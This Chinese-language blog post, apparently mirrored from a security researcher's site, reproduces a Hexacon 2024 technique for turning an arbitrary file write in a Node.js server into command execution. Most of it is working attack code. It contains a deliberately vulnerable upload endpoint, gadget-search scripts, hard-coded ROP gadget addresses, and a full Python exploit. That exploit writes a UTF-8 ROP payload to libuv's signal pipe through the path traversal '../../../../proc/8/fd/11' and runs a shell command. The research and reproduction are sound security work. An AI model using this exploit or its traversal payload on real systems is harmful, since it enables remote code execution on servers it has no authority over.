Exploiting File Writes in Hardened Node.js Environments
2024-10-15 18:23:33 Author: bestwing.me(查看原文) 阅读量:0 收藏

TL; DR

在 Hexacon 2024 上关注到了这么一个议题 《Exploiting File Writes in Hardened Environments - From HTTP Request to ROP Chain in Node.js 》, 同时该作者发了一个简单的 Blog 讲述了下这个原理以及部分细节。[1] 这里简单快速复现一下。

环境

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
const express = require('express');
const fs = require('fs');
const path = require('path');
const app = express();

app.use(express.json());

app.post('/upload', (req, res) => {
const { filename, content } = req.body;

if (!filename || !content) {
return res.status(400).json({ message: 'Filename and content are required!' });
}

const filePath = path.join(__dirname, 'uploads', filename);

fs.writeFile(filePath, content, (err) => {
if (err) {
return res.status(500).json({ message: 'Error saving file!' });
}
res.json({ message: 'File uploaded successfully!', path: filePath });
});
});

app.listen(3000, () => {
console.log('Server running on http://localhost:3000');
});

按照文章的描述, 我们先随便构造一个可以任意文件写的 nodejs 服务 (在假设环境是readonly 的情况下)

Exploit

按照文章的描述, nodejs 使用了 libuv 的这么一个库, 这个库在初始化的时候会的打开一个 Pipe 管道, 作者通过审计的时候发现有一个函数 uv__signal_event [2]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static void uv__signal_event(uv_loop_t* loop,
uv__io_t* w,
unsigned int events) {
uv__signal_msg_t* msg;
uv_signal_t* handle;
char buf[sizeof(uv__signal_msg_t) * 32];
size_t bytes, end, i;
int r;

bytes = 0;
end = 0;

do {
r = read(loop->signal_pipefd[0], buf + bytes, sizeof(buf) - bytes);

if (r == -1 && errno == EINTR)
continue;
...

end = (bytes / sizeof(uv__signal_msg_t)) * sizeof(uv__signal_msg_t);

for (i = 0; i < end; i += sizeof(uv__signal_msg_t)) {
msg = (uv__signal_msg_t*) (buf + i);
handle = msg->handle;

if (msg->signum == handle->signum) {
assert(!(handle->flags & UV_HANDLE_CLOSING));
handle->signal_cb(handle, handle->signum);
}

handle->dispatched_signals++;

if (handle->flags & UV_SIGNAL_ONE_SHOT)
uv__signal_stop(handle);
}

在这个函数中, 从 loop->signal_pipefd[0] 读内容, 然后做一个 signum检查, 就会使用传过来的数据解引用出来一个函数指针,然后直接调用

1
2
3
4
5
6
handle = msg->handle;

if (msg->signum == handle->signum) {
assert(!(handle->flags & UV_HANDLE_CLOSING));
handle->signal_cb(handle, handle->signum);
}

uv__signal_msg_t数据结构仅包含两个成员,一个句柄指针和一个称为signum的整数:

1
2
3
4
typedef struct {
uv_signal_t* handle;
int signum;
} uv__signal_msg_t;

在这个 Pipe 是可 uv__make_pipe 函数创建的, 在 Docker 容器中是fd 为 11 的描述符

image.png

当然这个fd num 值更好的判断就是下一个断点, 然后简单通过 echo 发点数据就能确认 ( 不要在真实机器上测试, 会把一些 lib 写坏掉)

Overview Data Structure

image.png

对于我们来说, 我们有一个任意文件写入的方法, 我们通过这个方法往 Pipe 中写入我们构造的数据, 我们要构造的数据如上

发送过来的数据包含两个部分, 一个是 *handle 指针, 和 signum, 其中 *handle 指针指向的数据包含两个部分

  • signal_cb
  • signum

我们要构造 uv_signal_msg_tsignumuv_signal_s 结构体中的 signum 相等, 才会调用 signal_cb , 并且, 由于我们构造的这个场景是通过 fs.writeFile 函数写入内容的

用于写入文件的函数(本例中为 fs.writeFile)仅限于有效的 UTF-8 数据。因此,写入管道的所有数据都必须是有效的 UTF-8。

如果满足上述条件, 我们就可以劫持程序流,控制程序执行到我们想要的地方

Searching Data Structure Gadgets

由于 FROM node:18@sha256:f910225c96b0f77b0149f350a3184568a9ba6cddba2a7c7805cc125a50591605 我们这个方式拉取的 node 程序本身是没有开PIE的

1
2
3
4
5
6
7
8
9
osboxes@osboxes:~$ checksec node
[*] '/home/osboxes/node'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
Debuginfo: Yes

因此我们可以尝试在 node 程序中尝试找合适的 gadget。 我考虑到如果程序起来只有可能会有一些数据写在 bss 或者 data 段上, 因此我 search 的范围是将程序正常启动,然后 dump memory

image.png

由于执行到 signal_cb 的时候, 此时场景如下:

image.png

image.png

我们仅仅需要找几个 pop xxx , pop xxx, .* ret 的 gadget 就行, 那么代码思路如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
for addr, length in segments:
for offset in range(length-4):
handle = addr + offset
if not is_valid_utf8(p64(handle-0x60)):
continue
signum = read_mem(handle+8, 4)
if not is_valid_utf8(signum):
continue
ptr = read_mem(handle, 8)
data = read_mem(u64(ptr), 30)
if data is None:
continue
out = disasm(data, arch='amd64', byte=False, offset=False)
if is_useful_gadget(out):
print('handle',hex(handle), '->', 'ptr:', u64(ptr), 'signum', hex(u32(signum)))
print(out)

首先从头开始遍历, 由于调用的callback 指针是从 handle+60h 获取的, 因此我们第一个要校验的 *handle 是要减去 0x60 的, 然后从 handle + 8 后取 4个字节, 作为signum ,判断这两者是否都符合 utf-8 编码, 如果是将这个指针读出来, 接着读取这个指针的指向的gadget , 这里假设 depth 为 30 , 然后尝试去反汇编, 然后判断这个 gadget 是不是符合 pop xxx , ret 的形式, 如果是将这些值打印出来。

我这里没有做更细致的处理,打印出来的 gadget 可能比较丑, 大概长这样

image.png

很幸运的是, 我的第一个 gadget 就是满足的, 且适合我用来做栈迁移的

1
2
3
4
5
6
7
8
9

root@osboxes:/home/osboxes
handle 0x4261af -> ptr: 12048128(0xB7D700) signum 0xb7d900
pop r12
pop r13
pop r14
pop r15
pop rbp
ret

那么此时我构造出来的数据就大致长这样

1
2
3
4
5
6
7
8
9
uv_signal_msg_t.               
....
*handle (0x4261af) --------> uv_signal_s
signum (0xb7d900). ...

*signal_cb(0xB7D700) : pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
signum (0xb7d900)
...

1
2
content   = p64(0x4261af - 0x60)  
content += p64(0xb7d900)

这里贴下我完整的 search 脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

from pwn import *

def is_valid_utf8(byte_seq):
try:
byte_seq.decode('utf-8')
return True
except UnicodeDecodeError:
return False


def read_mem(addr, size):
if 0x0000000000400000< addr< 0x0000000004ff1000:
base = 0x0000000000400000
data = mem1[addr-base: addr+size-base]
elif 0x00000000051f1000 < addr < 0x00000000051f4000:
base = 0x00000000051f1000
data = mem2[addr-base: addr+size-base]
elif 0x00000000051f4000 < addr < 0x000000000520f000:
base = 0x00000000051f4000
data = mem3[addr-base: addr+size-base]
else:
return None
return data

def is_useful_gadget(out):
dis_list = out.split('\n')
for n, x in enumerate(dis_list):
if x == 'ret':
for _ in range(0, n):
if 'bad' in dis_list[_] :
return False
return True
return False

with open("mem1", "rb") as f:
mem1 = f.read()

with open("mem2", "rb") as f:
mem2 = f.read()

with open("mem3", "rb") as f:
mem3 = f.read()

segments = [(0x0000000000400000, 0x0000000004ff1000-0x0000000000400000), (0x00000000051f1000, 0x00000000051f4000-0x00000000051f1000), (0x00000000051f4000, 0x000000000520f000-0x00000000051f4000)]


for addr, length in segments:
for offset in range(length-4):
handle = addr + offset
if not is_valid_utf8(p64(handle-0x60)):
continue
signum = read_mem(handle+8, 4)
if not is_valid_utf8(signum):
continue
ptr = read_mem(handle, 8)
data = read_mem(u64(ptr), 30)
if data is None:
continue
out = disasm(data, arch='amd64', byte=False, offset=False)
if is_useful_gadget(out):
print('handle',hex(handle), '->', 'ptr:', u64(ptr), 'signum', hex(u32(signum)))
print(out)

ROP Chain

当能栈迁移后, 后面就是拼接 ROP chain的流程了, 由于程序本身没有 system 、 popen 等函数的调用 ,所以我没有法直接 ret2text, 我将我的思路简单定成如下:

  • 找到一个 gadget 能从任意地址读取值, 然后赋值到某个寄存器上
  • 找到一个gadget 能对可控的寄存器进行加减法运算
  • 找到一个 libc 函数, 该函数与 system 的偏移满足 UTF-8 编码

首先通过 ROPchain 将所有可能能用的 gadget 输出成一个文件, 然后重新过滤下看哪些地址是符合 utf-8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
def is_valid_utf8(byte_seq):
try:
byte_seq.decode('utf-8')
return True
except UnicodeDecodeError:
return False

lines = [ line.replace('\n','') for line in open('./gadgets','r').readlines()]
lines = list(filter(lambda line: ' : ' in line , lines))
lines = list(map(lambda line: line.split(' : '),lines))


result = list(filter(lambda l: is_valid_utf8(p64(int(l[0],16))),lines ))
for i in result:
print(i[0],' : ',i[1])

通过这个过滤,我找到了两条 gadget

1
2
0x0000000001097367  :  add rax, rdx ; ret
0x0000000002176b34 : mov rax, qword ptr [rsi] ; ret

第i三个 libc 函数,我找到的是, setegid , 它与system的偏移为 0xb1f30 符合 UTF-8

通过组合我们构造出如下 ropchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
content  = p64(0x4261af - 0x60) + p64(0xb7d900)
content += p64(pop_rdx_ret)
content += p64(0x100)
content += p64(add_rax_rdx_ret)
content += p64(pop_rdx_ret)
content += p64(pop_rsi_ret)
content += p64(mov_rdi_rax_pop_rbp_jump_rdx)
content += b'aaaaaaaa'
content += p64(setegid_got)
content += p64(mov_rax_qword_ptr_rsi_ret)
content += p64(pop_rdx_ret)
content += p64(0xb1f30)
content += p64(sub_rax_rdx_ret)
content += p64(0x0000000003adace7)
content += b'a'*0x100 + b'; touch /tmp/hacked ; '

最后就可以执行任意命令了

完整 exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from pwn import *
import json
import requests
from urllib.parse import quote





content = p64(0x4261af - 0x60) + p64(0xb7d900) + b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'


pop_rdi_ret = 0x0000000000427748
pop_rsi_ret = 0x0000000000433d27
pop_rdx_ret = 0x0000000001634a57
sub_rax_rdx_ret = 0x00000000017e7432
mov_rax_qword_ptr_rsi_ret = 0x0000000002176b34
mov_rdi_rax_pop_rbp_jmp_rdx = 0x000000000190ade9
mov_rbp_rsp_pop_rbp_ret = 0x0000000001b1da5d

add_rax_rdx_ret = 0x0000000001097367
jump_rsp = 0x0000000000430657
mov_rdi_rax_pop_rbp_jump_rdx = 0x000000000190ade9
mprotect_plt = 0xa98eb0
setegid_got = 0x51f3f08

content = p64(0x4261af - 0x60) + p64(0xb7d900)
content += p64(pop_rdx_ret)
content += p64(0x100)
content += p64(add_rax_rdx_ret)
content += p64(pop_rdx_ret)
content += p64(pop_rsi_ret)
content += p64(mov_rdi_rax_pop_rbp_jump_rdx)
content += b'aaaaaaaa'
content += p64(setegid_got)
content += p64(mov_rax_qword_ptr_rsi_ret)
content += p64(pop_rdx_ret)
content += p64(0xb1f30)
content += p64(sub_rax_rdx_ret)
content += p64(0x0000000003adace7)
content += b'a'*0x100 + b'; touch /tmp/hacked ; '


a = content.decode('utf-8')
print(f"content: {content}")
data = {'filename':"../../../../proc/8/fd/11","content":content.decode('utf-8')}


resp = requests.post("http://localhost:3000/upload",data = json.dumps(data),headers = {"Content-Type":"application/json"})




文章来源: https://bestwing.me/Exploiting%20File%20Writes%20in%20Hardened%20Environments.html
如有侵权请联系:admin#unsafe.sh